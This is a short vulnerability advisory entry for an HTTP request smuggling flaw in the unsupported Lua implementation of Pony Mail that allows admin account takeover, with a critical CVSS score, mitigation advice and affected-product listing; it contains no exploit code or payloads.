** UNSUPPORTED WHEN ASSIGNED ** Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in Pony Mail leading to admin account takeover. This issue affects all versions of the Lua implementation of Pony Mail. There is a Python implementation under development under the name "Pony Mail Foal" that is not affected by this issue, but hasn't been released yet. As the Lua implementation of this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache pony_mail *